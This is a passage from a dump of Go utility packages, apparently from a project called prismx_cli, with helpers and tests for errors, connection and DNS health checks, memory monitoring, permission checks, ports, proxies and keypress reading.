21 | func NewWithFmt(fmt string) ErrWithFmt {
22 | if fmt == "" {
23 | panic("format can't be empty")
24 | }
25 |
26 | return ErrWithFmt{fmt: fmt}
27 | }
28 |
--------------------------------------------------------------------------------
/utils/putils/errors/errinterface.go:
--------------------------------------------------------------------------------
1 | package errorutil
2 |
3 | // Error is enriched version of normal error
4 | // with tags, stacktrace and other methods
5 | type Error interface {
6 | // WithTag assigns tag[s] to Error
7 | WithTag(tag ...string) Error
8 | // WithLevel assigns given ErrorLevel
9 | WithLevel(level ErrorLevel) Error
10 | // Error is interface method of 'error'
11 | Error() string
12 | // Wraps existing error with errors (skips if passed error is nil)
13 | Wrap(err ...error) Error
14 | // Msgf wraps error with given message
15 | Msgf(format string, args ...any) Error
16 | // Equal Checks Equality of errors
17 | Equal(err ...error) bool
18 | // WithCallback execute ErrCallback function when Error is triggered
19 | WithCallback(handle ErrCallback) Error
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/errors/errlevel.go:
--------------------------------------------------------------------------------
1 | package errorutil
2 |
3 | type ErrorLevel uint
4 |
5 | const (
6 | Panic ErrorLevel = iota
7 | Fatal
8 | Runtime // Default
9 | )
10 |
11 | func (l ErrorLevel) String() string {
12 | switch l {
13 | case Panic:
14 | return "PANIC"
15 | case Fatal:
16 | return "FATAL"
17 | case Runtime:
18 | return "RUNTIME"
19 | }
20 | return "RUNTIME" //default is runtime
21 | }
22 |
--------------------------------------------------------------------------------
/utils/putils/exec/README.md:
--------------------------------------------------------------------------------
1 | # executil
2 | The package contains various helpers to interact binary execution
--------------------------------------------------------------------------------
/utils/putils/file/README.md:
--------------------------------------------------------------------------------
1 | # fileutil
2 | The package contains various helpers to interact with files
--------------------------------------------------------------------------------
/utils/putils/file/tests/empty_lines.txt:
--------------------------------------------------------------------------------
1 | test
2 | test1
3 |
4 |
5 |
6 |
7 | test2
8 |
9 |
10 | test3
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 | test4
19 |
--------------------------------------------------------------------------------
/utils/putils/file/tests/path-traversal.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/file/tests/path-traversal.txt
--------------------------------------------------------------------------------
/utils/putils/file/tests/pipe_separator.txt:
--------------------------------------------------------------------------------
1 | test|test1|test2|test3|test4
2 |
--------------------------------------------------------------------------------
/utils/putils/file/tests/standard.txt:
--------------------------------------------------------------------------------
1 | test
2 | test1
3 | test2
4 | test3
5 | test4
6 |
--------------------------------------------------------------------------------
/utils/putils/folder/README.md:
--------------------------------------------------------------------------------
1 | # folderutil
2 | The package contains various helpers to interact with folders
3 |
4 | ## UserConfigDirOrDefault
5 |
6 | UserConfigDirOrDefault returns the default root directory to use for user-specific configuration data. Users should create their own application-specific subdirectory within this one and use that.
7 |
8 | On Unix systems, it returns $XDG_CONFIG_HOME as specified by https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html if non-empty, else $HOME/.config. On Darwin, it returns $HOME/Library/Application Support. On Windows, it returns %AppData%. On Plan 9, it returns $home/lib.
9 |
10 | If the location cannot be determined (for example, $HOME is not defined), then it will return given value as default.
--------------------------------------------------------------------------------
/utils/putils/folder/folderutil_linux_test.go:
--------------------------------------------------------------------------------
1 | //go:build !windows
2 |
3 | package folderutil
4 |
5 | import (
6 | "testing"
7 |
8 | "github.com/stretchr/testify/assert"
9 | )
10 |
11 | func TestPathInfo(t *testing.T) {
12 | got, err := NewPathInfo("/a/b/c")
13 | assert.Nil(t, err)
14 | gotPaths, err := got.Paths()
15 | assert.Nil(t, err)
16 | assert.EqualValues(t, []string{"/", "/a", "/a/b", "/a/b/c"}, gotPaths)
17 | gotMeshPaths, err := got.MeshWith("test.txt")
18 | assert.Nil(t, err)
19 | assert.EqualValues(t, []string{"/test.txt", "/a/test.txt", "/a/b/test.txt", "/a/b/c/test.txt"}, gotMeshPaths)
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/folder/folderutil_win_test.go:
--------------------------------------------------------------------------------
1 | //go:build windows
2 |
3 | package folderutil
4 |
5 | import (
6 | "testing"
7 |
8 | "github.com/stretchr/testify/assert"
9 | )
10 |
11 | func TestPathInfo(t *testing.T) {
12 | got, err := NewPathInfo("c:\\a\\b\\c")
13 | assert.Nil(t, err)
14 | gotPaths, err := got.Paths()
15 | assert.Nil(t, err)
16 | assert.EqualValues(t, []string{".", "c:\\", "c:\\a", "c:\\a\\b", "c:\\a\\b\\c"}, gotPaths)
17 | gotMeshPaths, err := got.MeshWith("test.txt")
18 | assert.Nil(t, err)
19 | assert.EqualValues(t, []string{"test.txt", "c:\\test.txt", "c:\\a\\test.txt", "c:\\a\\b\\test.txt", "c:\\a\\b\\c\\test.txt"}, gotMeshPaths)
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/generic/generic.go:
--------------------------------------------------------------------------------
1 | package generic
2 |
3 | import (
4 | "bytes"
5 | "encoding/gob"
6 | )
7 |
8 | // EqualsAny checks if a base value of type T is equal to
9 | // any of the other values of type T provided as arguments.
10 | func EqualsAny[T comparable](base T, all ...T) bool {
11 | for _, v := range all {
12 | if v == base {
13 | return true
14 | }
15 | }
16 | return false
17 | }
18 |
19 | // EqualsAll checks if a base value of type T is equal to all of the
20 | // other values of type T provided as arguments.
21 | func EqualsAll[T comparable](base T, all ...T) bool {
22 | if len(all) == 0 {
23 | return false
24 | }
25 | for _, v := range all {
26 | if v != base {
27 | return false
28 | }
29 | }
30 | return true
31 | }
32 |
33 | // SizeOf returns the approx size of a variable in bytes
34 | func ApproxSizeOf[T any](v T) (int, error) {
35 | buf := new(bytes.Buffer)
36 | if err := gob.NewEncoder(buf).Encode(v); err != nil {
37 | return 0, err
38 | }
39 | return buf.Len(), nil
40 | }
41 |
--------------------------------------------------------------------------------
/utils/putils/generic/lockable.go:
--------------------------------------------------------------------------------
1 | package generic
2 |
3 | import (
4 | "sync"
5 | )
6 |
7 | type Lockable[K any] struct {
8 | V K
9 | sync.RWMutex
10 | }
11 |
12 | func (v *Lockable[K]) Do(f func(val K)) {
13 | v.Lock()
14 | defer v.Unlock()
15 | f(v.V)
16 | }
17 |
18 | func WithLock[K any](val K) *Lockable[K] {
19 | return &Lockable[K]{V: val}
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/generic/lockable_test.go:
--------------------------------------------------------------------------------
1 | package generic
2 |
3 | import (
4 | "sync"
5 | "testing"
6 | )
7 |
8 | func TestDo(t *testing.T) {
9 | val := 10
10 | l := WithLock(val)
11 | l.Do(func(v int) {
12 | if v != val {
13 | t.Errorf("Expected %d, got %d", val, v)
14 | }
15 | })
16 | }
17 |
18 | func TestLockableConcurrency(t *testing.T) {
19 | l := WithLock(0)
20 |
21 | var wg sync.WaitGroup
22 |
23 | for i := 0; i < 100; i++ {
24 | wg.Add(1)
25 | go func() {
26 | defer wg.Done()
27 | for j := 0; j < 1000; j++ {
28 | l.Do(func(v int) {
29 | v++
30 | l.V = v
31 | })
32 | }
33 | }()
34 | }
35 |
36 | wg.Wait()
37 |
38 | if l.V != 100*1000 {
39 | t.Errorf("Expected counter to be %d, but got %d", 100*1000, l.V)
40 | }
41 | }
42 |
43 | func TestLockableStringManipulation(t *testing.T) {
44 | str := "initial"
45 | l := WithLock(str)
46 |
47 | l.Do(func(s string) {
48 | s += " - updated"
49 | l.V = s
50 | })
51 |
52 | if l.V != "initial - updated" {
53 | t.Errorf("Expected 'initial - updated', got '%s'", str)
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/utils/putils/healthcheck/connection.go:
--------------------------------------------------------------------------------
1 | package healthcheck
2 |
3 | import (
4 | "fmt"
5 | "net"
6 | "strconv"
7 | "time"
8 | )
9 |
10 | type ConnectionInfo struct {
11 | Host string
12 | Successful bool
13 | Message string
14 | Error error
15 | }
16 |
17 | func CheckConnection(host string, port int, protocol string, timeout time.Duration) ConnectionInfo {
18 | address := net.JoinHostPort(host, strconv.Itoa(port))
19 | conn, err := net.DialTimeout(protocol, address, timeout)
20 | if conn != nil {
21 | conn.Close()
22 | }
23 |
24 | return ConnectionInfo{
25 | Host: host,
26 | Successful: err == nil,
27 | Message: fmt.Sprintf("%s Connect (%s:%v): %s", protocol, host, port, "Successful"),
28 | Error: err,
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/utils/putils/healthcheck/connection_test.go:
--------------------------------------------------------------------------------
1 | package healthcheck
2 |
3 | import (
4 | "testing"
5 | "time"
6 |
7 | "github.com/stretchr/testify/assert"
8 | )
9 |
10 | func TestCheckConnection(t *testing.T) {
11 | t.Run("Test successful connection", func(t *testing.T) {
12 | info := CheckConnection("scanme.sh", 80, "tcp", 1*time.Second)
13 | assert.NoError(t, info.Error)
14 | assert.True(t, info.Successful)
15 | assert.Equal(t, "scanme.sh", info.Host)
16 | assert.Contains(t, info.Message, "Successful")
17 | })
18 |
19 | t.Run("Test unsuccessful connection", func(t *testing.T) {
20 | info := CheckConnection("invalid.website", 80, "tcp", 1*time.Second)
21 | assert.Error(t, info.Error)
22 | })
23 |
24 | t.Run("Test timeout connection", func(t *testing.T) {
25 | info := CheckConnection("192.0.2.0", 80, "tcp", 1*time.Millisecond)
26 | assert.Error(t, info.Error)
27 | })
28 | }
29 |
--------------------------------------------------------------------------------
/utils/putils/healthcheck/dns.go:
--------------------------------------------------------------------------------
1 | package healthcheck
2 |
3 | import (
4 | "context"
5 | "net"
6 | "strings"
7 | )
8 |
9 | type DnsResolveInfo struct {
10 | Host string
11 | Resolver string
12 | Successful bool
13 | IPAddresses []net.IPAddr
14 | Error error
15 | }
16 |
17 | func DnsResolve(host string, resolver string) DnsResolveInfo {
18 | ipAddresses, err := getIPAddresses(host, resolver)
19 |
20 | return DnsResolveInfo{
21 | Host: host,
22 | Resolver: resolver,
23 | Successful: err == nil,
24 | IPAddresses: ipAddresses,
25 | Error: err,
26 | }
27 | }
28 |
29 | func getIPAddresses(name, dnsServer string) ([]net.IPAddr, error) {
30 | if !strings.Contains(dnsServer, ":") {
31 | dnsServer = dnsServer + ":53"
32 | }
33 |
34 | resolver := net.Resolver{
35 | PreferGo: true, Dial: func(ctx context.Context, network, _ string) (net.Conn, error) {
36 | d := net.Dialer{}
37 | return d.DialContext(ctx, network, dnsServer)
38 | }}
39 |
40 | resolvedIPs, err := resolver.LookupIPAddr(context.Background(), name)
41 | if err != nil {
42 | return nil, err
43 | }
44 |
45 | return resolvedIPs, nil
46 | }
47 |
--------------------------------------------------------------------------------
/utils/putils/healthcheck/dns_test.go:
--------------------------------------------------------------------------------
1 | package healthcheck
2 |
3 | import (
4 | "testing"
5 |
6 | "github.com/stretchr/testify/assert"
7 | )
8 |
9 | func TestDnsResolve(t *testing.T) {
10 | t.Run("Successful resolution", func(t *testing.T) {
11 | info := DnsResolve("scanme.sh", "1.1.1.1")
12 | assert.NoError(t, info.Error)
13 | assert.True(t, info.Successful)
14 | assert.Equal(t, "scanme.sh", info.Host)
15 | assert.Equal(t, "1.1.1.1", info.Resolver)
16 | assert.NotEmpty(t, info.IPAddresses)
17 | })
18 |
19 | t.Run("Unsuccessful resolution due to invalid host", func(t *testing.T) {
20 | info := DnsResolve("invalid.website", "1.1.1.1")
21 | assert.Error(t, info.Error)
22 | })
23 |
24 | t.Run("Unsuccessful resolution due to invalid resolver", func(t *testing.T) {
25 | info := DnsResolve("google.com", "invalid.resolver")
26 | assert.Error(t, info.Error)
27 | })
28 | }
29 |
--------------------------------------------------------------------------------
/utils/putils/healthcheck/path_permission.go:
--------------------------------------------------------------------------------
1 | package healthcheck
2 |
3 | import (
4 | "errors"
5 |
6 | fileutil "prismx_cli/utils/putils/file"
7 | )
8 |
9 | type PathPermission struct {
10 | path string
11 | isReadable bool
12 | isWritable bool
13 | Error error
14 | }
15 |
16 | // CheckPathPermission checks the permissions of the given file or directory.
17 | func CheckPathPermission(path string) (pathPermission PathPermission) {
18 | pathPermission.path = path
19 | if !fileutil.FileExists(path) {
20 | pathPermission.Error = errors.New("file or directory doesn't exist at " + path)
21 | return
22 | }
23 |
24 | pathPermission.isReadable, _ = fileutil.IsReadable(path)
25 | pathPermission.isWritable, _ = fileutil.IsWriteable(path)
26 |
27 | return
28 | }
29 |
--------------------------------------------------------------------------------
/utils/putils/http/README.md:
--------------------------------------------------------------------------------
1 | # httputil
2 | The package contains various helpers related to http protocol
--------------------------------------------------------------------------------
/utils/putils/ip/README.md:
--------------------------------------------------------------------------------
1 | # iputil
2 | The package contains various helpers to interact with ips and cidrs
--------------------------------------------------------------------------------
/utils/putils/maps/README.md:
--------------------------------------------------------------------------------
1 | # mapsutil
2 | The package contains various helpers to interact with maps
--------------------------------------------------------------------------------
/utils/putils/memguardian/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/memguardian/README.MD
--------------------------------------------------------------------------------
/utils/putils/memguardian/doc.go:
--------------------------------------------------------------------------------
1 | // memguardian is a package that provides a simple RAM memory control mechanism
2 | // once activated it sets an internal atomic boolean when the RAM usage exceed in absolute
3 | // terms the warning ratio, for passive indirect check or invoke an optional callback for
4 | // reactive backpressure
5 | package memguardian
6 |
--------------------------------------------------------------------------------
/utils/putils/memguardian/memory.go:
--------------------------------------------------------------------------------
1 | package memguardian
2 |
3 | type SysInfo struct {
4 | Uptime int64
5 | totalRam uint64
6 | freeRam uint64
7 | SharedRam uint64
8 | BufferRam uint64
9 | TotalSwap uint64
10 | FreeSwap uint64
11 | Unit uint64
12 | usedPercent float64
13 | }
14 |
15 | func (si *SysInfo) TotalRam() uint64 {
16 | return uint64(si.totalRam) * uint64(si.Unit)
17 | }
18 |
19 | func (si *SysInfo) FreeRam() uint64 {
20 | return uint64(si.freeRam) * uint64(si.Unit)
21 | }
22 |
23 | func (si *SysInfo) UsedRam() uint64 {
24 | return si.TotalRam() - si.FreeRam()
25 | }
26 |
27 | func (si *SysInfo) UsedPercent() float64 {
28 | if si.usedPercent > 0 {
29 | return si.usedPercent
30 | }
31 |
32 | return 100 * float64((si.TotalRam()-si.FreeRam())*si.Unit) / float64(si.TotalRam())
33 | }
34 |
35 | func GetSysInfo() (*SysInfo, error) {
36 | return getSysInfo()
37 | }
38 |
--------------------------------------------------------------------------------
/utils/putils/memguardian/memory_linux.go:
--------------------------------------------------------------------------------
1 | //go:build linux
2 |
3 | package memguardian
4 |
5 | import "syscall"
6 |
7 | func getSysInfo() (*SysInfo, error) {
8 | var sysInfo syscall.Sysinfo_t
9 | err := syscall.Sysinfo(&sysInfo)
10 | if err != nil {
11 | return nil, err
12 | }
13 |
14 | si := &SysInfo{
15 | Uptime: int64(sysInfo.Uptime),
16 | totalRam: uint64(sysInfo.Totalram),
17 | freeRam: uint64(sysInfo.Freeram),
18 | SharedRam: uint64(sysInfo.Freeram),
19 | BufferRam: uint64(sysInfo.Bufferram),
20 | TotalSwap: uint64(sysInfo.Totalswap),
21 | FreeSwap: uint64(sysInfo.Freeswap),
22 | Unit: uint64(sysInfo.Unit),
23 | }
24 |
25 | return si, nil
26 | }
27 |
--------------------------------------------------------------------------------
/utils/putils/memguardian/memory_others.go:
--------------------------------------------------------------------------------
1 | //go:build !linux
2 |
3 | package memguardian
4 |
5 | import "github.com/shirou/gopsutil/mem"
6 |
7 | // TODO: replace with native syscall
8 | func getSysInfo() (*SysInfo, error) {
9 | vms, err := mem.VirtualMemory()
10 | if err != nil {
11 | return nil, err
12 | }
13 | si := &SysInfo{
14 | totalRam: vms.Total,
15 | freeRam: vms.Free,
16 | SharedRam: vms.Shared,
17 | TotalSwap: vms.SwapTotal,
18 | FreeSwap: vms.SwapFree,
19 | usedPercent: vms.UsedPercent,
20 | }
21 |
22 | return si, nil
23 | }
24 |
--------------------------------------------------------------------------------
/utils/putils/ml/model_selection/model_selection.go:
--------------------------------------------------------------------------------
1 | package modelselection
2 |
3 | import (
4 | "math/rand"
5 | )
6 |
7 | func TrainTestSplit(dataset []interface{}, testSize float64) (train, test []interface{}) {
8 | for _, data := range dataset {
9 | if rand.Float64() > testSize {
10 | train = append(train, data)
11 | } else {
12 | test = append(test, data)
13 | }
14 | }
15 | return train, test
16 | }
17 |
--------------------------------------------------------------------------------
/utils/putils/ml/naive_bayes/naive_bayes_classifier_test.go:
--------------------------------------------------------------------------------
1 | package naive_bayes
2 |
3 | import (
4 | "testing"
5 |
6 | "github.com/stretchr/testify/assert"
7 | )
8 |
9 | func TestNaiveBayesClassifier(t *testing.T) {
10 | // Create a new Naive Bayes Classifier
11 | threshold := 1.1
12 | nb := New(threshold)
13 |
14 | // Create a new training set
15 | trainingSet := map[string][]string{
16 | "Baseball": {
17 | "Pitcher",
18 | "Shortstop",
19 | "Outfield",
20 | },
21 | "Basketball": {
22 | "Point Guard",
23 | "Shooting Guard",
24 | "Small Forward",
25 | "Power Forward",
26 | "Center",
27 | },
28 | "Soccer": {
29 | "Goalkeeper",
30 | "Defender",
31 | "Midfielder",
32 | "Forward",
33 | },
34 | }
35 |
36 | // Train the classifier
37 | nb.Fit(trainingSet)
38 |
39 | //then
40 | assert.Equal(t, nb.Classify("Point guard"), "Basketball")
41 | }
42 |
--------------------------------------------------------------------------------
/utils/putils/ml/types.go:
--------------------------------------------------------------------------------
1 | package mlutils
2 |
3 | type LabeledDocument struct {
4 | Label string
5 | Document string
6 | }
7 |
--------------------------------------------------------------------------------
/utils/putils/net/net.go:
--------------------------------------------------------------------------------
1 | package netutil
2 |
3 | import (
4 | "errors"
5 | "net"
6 | )
7 |
8 | var ErrMissingPort = errors.New("missing port")
9 |
10 | // TryJoinHostPort joins host and port. If port is empty, it returns host and an error.
11 | func TryJoinHostPort(host, port string) (string, error) {
12 | if host == "" {
13 | return "", &net.AddrError{Err: "missing host", Addr: host}
14 | }
15 |
16 | if port == "" {
17 | return host, ErrMissingPort
18 | }
19 |
20 | return net.JoinHostPort(host, port), nil
21 | }
22 |
--------------------------------------------------------------------------------
/utils/putils/os/arch.go:
--------------------------------------------------------------------------------
1 | package osutils
2 |
3 | import "runtime"
4 |
5 | type ArchType uint8
6 |
7 | const (
8 | I386 ArchType = iota
9 | Amd64
10 | Amd64p32
11 | Arm
12 | Armbe
13 | Arm64
14 | Arm64be
15 | Loong64
16 | Mips
17 | Mipsle
18 | Mips64
19 | Mips64le
20 | Mips64p32
21 | Mips64p32le
22 | Ppc
23 | Ppc64
24 | Ppc64le
25 | Riscv
26 | Riscv64
27 | S390
28 | S390x
29 | Sparc
30 | Sparc64
31 | Wasm
32 | UknownArch
33 | )
34 |
35 | var Arch ArchType
36 |
37 | func init() {
38 | switch {
39 | case Is386():
40 | Arch = I386
41 | case IsAmd64():
42 | Arch = Amd64
43 | case IsARM():
44 | Arch = Arm
45 | case IsARM64():
46 | Arch = Arm64
47 | case IsWasm():
48 | Arch = Wasm
49 | default:
50 | Arch = UknownArch
51 | }
52 | }
53 |
54 | func Is386() bool {
55 | return runtime.GOARCH == "386"
56 | }
57 |
58 | func IsAmd64() bool {
59 | return runtime.GOARCH == "amd64"
60 | }
61 |
62 | func IsARM() bool {
63 | return runtime.GOARCH == "arm"
64 | }
65 |
66 | func IsARM64() bool {
67 | return runtime.GOARCH == "arm64"
68 | }
69 |
70 | func IsWasm() bool {
71 | return runtime.GOARCH == "wasm"
72 | }
73 |
--------------------------------------------------------------------------------
/utils/putils/patterns/doc.go:
--------------------------------------------------------------------------------
1 | // package patterns contains various common patterns
2 | // some regexps were extended from https://github.com/asaskevich/govalidator
3 | package patterns
4 |
--------------------------------------------------------------------------------
/utils/putils/permission/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/permission/README.md
--------------------------------------------------------------------------------
/utils/putils/permission/error.go:
--------------------------------------------------------------------------------
1 | package permissionutil
2 |
3 | import "errors"
4 |
5 | var ErrNotImplemented = errors.New("not implemented")
6 |
--------------------------------------------------------------------------------
/utils/putils/permission/permission.go:
--------------------------------------------------------------------------------
1 | package permissionutil
2 |
3 | var (
4 | IsRoot bool
5 | HasCapNetRaw bool
6 | )
7 |
8 | func init() {
9 | IsRoot, _ = checkCurrentUserRoot()
10 | HasCapNetRaw, _ = checkCurrentUserCapNetRaw()
11 | }
12 |
--------------------------------------------------------------------------------
/utils/putils/permission/permission_other.go:
--------------------------------------------------------------------------------
1 | //go:build darwin || freebsd || netbsd || openbsd || solaris || android || ios || (linux && armv7l) || (linux && armv8l)
2 |
3 | package permissionutil
4 |
5 | import (
6 | "os"
7 | )
8 |
9 | // checkCurrentUserRoot checks if the current user is root
10 | func checkCurrentUserRoot() (bool, error) {
11 | return os.Geteuid() == 0, nil
12 | }
13 |
14 | // checkCurrentUserCapNetRaw checks if the current user has the CAP_NET_RAW capability
15 | func checkCurrentUserCapNetRaw() (bool, error) {
16 | return false, ErrNotImplemented
17 | }
18 |
--------------------------------------------------------------------------------
/utils/putils/permission/permission_test.go:
--------------------------------------------------------------------------------
1 | //go:build windows || linux
2 |
3 | package permissionutil
4 |
5 | import (
6 | "testing"
7 |
8 | "github.com/stretchr/testify/require"
9 | )
10 |
11 | func TestIsRoot(t *testing.T) {
12 | isRoot, err := checkCurrentUserRoot()
13 | require.Nil(t, err)
14 | require.NotNil(t, isRoot)
15 | }
16 |
--------------------------------------------------------------------------------
/utils/putils/ports/ports.go:
--------------------------------------------------------------------------------
1 | package ports
2 |
3 | import (
4 | "strconv"
5 | )
6 |
7 | // IsValid checks if a port is valid
8 | func IsValid(v interface{}) bool {
9 | switch p := v.(type) {
10 | case string:
11 | return IsValidWithString(p)
12 | case int:
13 | return IsValidWithInt(p)
14 | }
15 | return false
16 | }
17 |
18 | // IsValidWithString checks if a string port is valid
19 | func IsValidWithString(p string) bool {
20 | port, err := strconv.Atoi(p)
21 | return err == nil && IsValidWithInt(port)
22 | }
23 |
24 | // IsValidWithInt checks if an int port is valid
25 | func IsValidWithInt(port int) bool {
26 | return port >= 1 && port <= 65535
27 | }
28 |
--------------------------------------------------------------------------------
/utils/putils/ports/ports_test.go:
--------------------------------------------------------------------------------
1 | package ports
2 |
3 | import (
4 | "testing"
5 |
6 | "github.com/stretchr/testify/require"
7 | )
8 |
9 | func TestIsValid(t *testing.T) {
10 | t.Run("valid-ports-strings", func(t *testing.T) {
11 | ports := []interface{}{"1", "10000", "65535", 1, 10000, 65535}
12 | for _, port := range ports {
13 | require.True(t, IsValid(port))
14 | }
15 | })
16 | t.Run("invalid-ports", func(t *testing.T) {
17 | ports := []interface{}{"", "-1", "0", "65536", 0, -1, 65536, 2.1, "a"}
18 | for _, port := range ports {
19 | require.False(t, IsValid(port))
20 | }
21 | })
22 | }
23 |
--------------------------------------------------------------------------------
/utils/putils/proxy/README.md:
--------------------------------------------------------------------------------
1 | ## proxy utils
2 |
3 |
--------------------------------------------------------------------------------
/utils/putils/proxy/proxy_test.go:
--------------------------------------------------------------------------------
1 | //go:build proxy
2 |
3 | package proxyutils
4 |
5 | // package tests will be executed only with (running proxy is necessary):
6 | // go test -tags proxy
7 |
8 | import (
9 | "testing"
10 |
11 | "github.com/stretchr/testify/require"
12 | )
13 |
14 | const burpURL = "http://127.0.0.1:8080"
15 |
16 | // a local instance of burp community is necessary
17 | func TestIsBurp(t *testing.T) {
18 | ok, err := IsBurp(burpURL)
19 | require.Nil(t, err)
20 | require.True(t, ok)
21 | }
22 |
23 | // a valid proxy is necessary
24 | func TestValidateOne(t *testing.T) {
25 | proxyURL, err := ValidateOne(burpURL)
26 | require.Nil(t, err)
27 | require.Equal(t, burpURL, proxyURL)
28 | }
29 |
--------------------------------------------------------------------------------
/utils/putils/ptr/ptr.go:
--------------------------------------------------------------------------------
1 | package ptr
2 |
3 | // Safe dereferences safely a pointer
4 | // - if the pointer is nil => returns the zero value of the type of the pointer if nil
5 | // - if the pointer is not nil => returns the dereferenced pointer
6 | func Safe[T any](v *T) T {
7 | if v == nil {
8 | return *new(T)
9 | }
10 | return *v
11 | }
12 |
--------------------------------------------------------------------------------
/utils/putils/ptr/ptr_test.go:
--------------------------------------------------------------------------------
1 | package ptr
2 |
3 | import (
4 | "github.com/stretchr/testify/require"
5 | "testing"
6 | )
7 |
8 | func TestSafe(t *testing.T) {
9 | type args[T any] struct {
10 | v *T
11 | }
12 | type testCase[T any] struct {
13 | name string
14 | args args[T]
15 | want T
16 | }
17 | tests := []testCase[int]{
18 | {
19 | name: "struct=>int - NilPointer",
20 | args: args[int]{v: nil},
21 | want: 0,
22 | },
23 | {
24 | name: "struct=>int - NonNilPointer",
25 | args: args[int]{v: new(int)},
26 | want: 0,
27 | },
28 | }
29 |
30 | for _, tt := range tests {
31 | t.Run(tt.name, func(t *testing.T) {
32 | got := Safe(tt.args.v)
33 | require.Equal(t, tt.want, got, "Safe() = %v, want %v", got, tt.want)
34 | })
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/utils/putils/race/README.md:
--------------------------------------------------------------------------------
1 | # raceutil
2 | The package contains various helpers for race
3 |
--------------------------------------------------------------------------------
/utils/putils/race/norace.go:
--------------------------------------------------------------------------------
1 | //go:build !race
2 |
3 | // Package raceutil reports if the Go race detector is enabled.
4 | package raceutil
5 |
6 | // Enabled reports if the race detector is enabled.
7 | const Enabled = false
8 |
--------------------------------------------------------------------------------
/utils/putils/race/race.go:
--------------------------------------------------------------------------------
1 | //go:build race
2 |
3 | // Package raceutil reports if the Go race detector is enabled.
4 | package raceutil
5 |
6 | // Enabled reports if the race detector is enabled.
7 | const Enabled = true
8 |
--------------------------------------------------------------------------------
/utils/putils/rand/number.go:
--------------------------------------------------------------------------------
1 | package rand
2 |
3 | import (
4 | "crypto/rand"
5 | "errors"
6 | "math/big"
7 | crand "math/rand"
8 | )
9 |
10 | // IntN returns a uniform random value in [0, max). It errors if max <= 0.
11 | func IntN(max int) (int, error) {
12 | if max <= 0 {
13 | return 0, errors.New("max can't be <= 0")
14 | }
15 | nBig, err := rand.Int(rand.Reader, big.NewInt(int64(max)))
16 | if err != nil {
17 | return crand.Intn(max), nil
18 | }
19 | return int(nBig.Int64()), nil
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/rand/number_test.go:
--------------------------------------------------------------------------------
1 | package rand
2 |
3 | import (
4 | "testing"
5 |
6 | "github.com/stretchr/testify/require"
7 | )
8 |
9 | func TestIntN(t *testing.T) {
10 | type testCase struct {
11 | input int
12 | expectedOk bool
13 | }
14 |
15 | testCases := []testCase{
16 | {input: 10, expectedOk: true},
17 | {input: 0, expectedOk: false},
18 | {input: -10, expectedOk: false},
19 | }
20 |
21 | for _, tc := range testCases {
22 | i, err := IntN(tc.input)
23 | ok := i >= 0 && i <= tc.input && err == nil
24 | require.Equal(t, tc.expectedOk, ok)
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/utils/putils/reader/error.go:
--------------------------------------------------------------------------------
1 | package reader
2 |
3 | import "errors"
4 |
5 | var ErrTimeout = errors.New("Timeout")
6 |
--------------------------------------------------------------------------------
/utils/putils/reader/examples/keypress/buffered/keypress.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "log"
5 | "sync"
6 | "time"
7 |
8 | "prismx_cli/utils/putils/reader"
9 | stringsutil "prismx_cli/utils/putils/strings"
10 | )
11 |
12 | func main() {
13 | stdr := reader.KeyPressReader{
14 | Timeout: time.Duration(5 * time.Second),
15 | Once: &sync.Once{},
16 | }
17 |
18 | stdr.Start()
19 | defer stdr.Stop()
20 |
21 | for {
22 | data := make([]byte, stdr.BufferSize)
23 | n, err := stdr.Read(data)
24 | log.Println(n, err)
25 |
26 | if stringsutil.IsCTRLC(string(data)) {
27 | break
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/utils/putils/reader/examples/keypress/raw/keypress.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "log"
5 | "sync"
6 | "time"
7 |
8 | "prismx_cli/utils/putils/reader"
9 | stringsutil "prismx_cli/utils/putils/strings"
10 | )
11 |
12 | func main() {
13 | stdr := reader.KeyPressReader{
14 | Timeout: time.Duration(5 * time.Second),
15 | Once: &sync.Once{},
16 | Raw: true,
17 | }
18 |
19 | stdr.Start()
20 | defer stdr.Stop()
21 |
22 | for {
23 | data := make([]byte, 1)
24 | n, err := stdr.Read(data)
25 | if stringsutil.IsPrintable(string(data)) {
26 | log.Println(n, err)
27 | }
28 |
29 | if stringsutil.IsCTRLC(string(data)) {
30 | break
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/utils/putils/reader/frozen_reader.go:
--------------------------------------------------------------------------------
1 | package reader
2 |
3 | import (
4 | "io"
5 | "math"
6 | "time"
7 | )
8 |
9 | // FrozenReader is a reader that never returns
10 | type FrozenReader struct{}
11 |
12 | // Read into the buffer
13 | func (reader FrozenReader) Read(p []byte) (n int, err error) {
14 | time.Sleep(math.MaxInt32 * time.Second)
15 | return 0, io.EOF
16 | }
17 |
--------------------------------------------------------------------------------
/utils/putils/reader/frozen_reader_test.go:
--------------------------------------------------------------------------------
1 | package reader
2 |
3 | import (
4 | "io"
5 | "os"
6 | "testing"
7 | "time"
8 | )
9 |
10 | func TestFrozenReader(t *testing.T) {
11 | forever := func() {
12 | wrappedStdin := FrozenReader{}
13 | _, err := io.Copy(os.Stdout, wrappedStdin)
14 | if err != nil {
15 | return
16 | }
17 | }
18 | go forever()
19 | <-time.After(10 * time.Second)
20 | }
21 |
--------------------------------------------------------------------------------
/utils/putils/reader/rawmode/raw_mode.go:
--------------------------------------------------------------------------------
1 | package rawmode
2 |
3 | import (
4 | "os"
5 | )
6 |
7 | var (
8 | // GetMode from file descriptor
